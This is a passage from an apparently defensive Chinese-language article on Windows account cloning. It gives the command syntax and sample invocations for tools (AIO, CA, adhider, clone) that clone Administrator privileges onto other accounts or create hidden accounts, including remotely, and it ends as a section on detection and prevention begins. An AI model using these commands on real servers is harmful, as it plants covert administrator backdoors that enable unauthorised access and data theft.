4.使用AIO克隆

AIO(All In One)是WinEggDrop写的一个把很多小工具功能集成一体的一个“工具”，其中有克隆用户、修改服务的启动类型、删除系统账户、检查系统隐藏服务、端口扫描和端口转发等等。

使用AIO克隆很简单，就是: Aio.exe -Clone 正常账号 要被克隆账户 密码
如: Aio.exe -Clone Administrator IUSR_XODU5PTT910NHOO n3tl04d
这样就可以用IUSR_XODU5PTT910NHOO\n3tl04d作为管理员登录了。
如图9所示。

图9

5.使用CA克隆

ca.exe 小榕编写的一个远程克隆账号工具，当然本地克隆也没问题。
用法如下：ca \\ip地址 管理员用户名 管理员密码 克隆的用户 密码
如：ca \\127.0.0.1 administrator 123456 IUSR_XODU5PTT910NHOO 123456
如图10所示。

图10

6.建立隐藏账号

需要使用的工具叫adhider，是锦毛鼠写的一个专门建立隐藏用户的工具。此工具有个缺点，那就是当服务器重启后，用户就隐藏不了，会在用户管理中显示出来。
用法如下：adhider 用户名 密码
如：adhider n3tl04d$\123456
如图11所示。

图11

7.使用clone克隆

clone是28度的冰写的一个克隆工具，只支持windows2003和windowsxp,不支持windows2000。此工具有个缺点，那就是当服务器重启后，用户就隐藏不了，会在用户管理中显示出来。
用法如下：Clone.exe 用户名 密码
如：clone n3tl04d 520mm
如图12所示。

图12

就可以使用n3tl04d\520mm登录，得到和管理员权限。

注意：在Windows 2003下如果使用clone克隆后，再使用MT检查，会提示你没有系统权限，此时需要重启电脑或者运行一个有system权限的cmd才能使用MT检查。

三、克隆用户安全检查与防范

当系统用户被克隆之后，更改管理员也无济于事，服务器上面的信息和数据还是被攻击者随意窃取。所以必须把克隆的用户清除，再做其它方面的安全检查。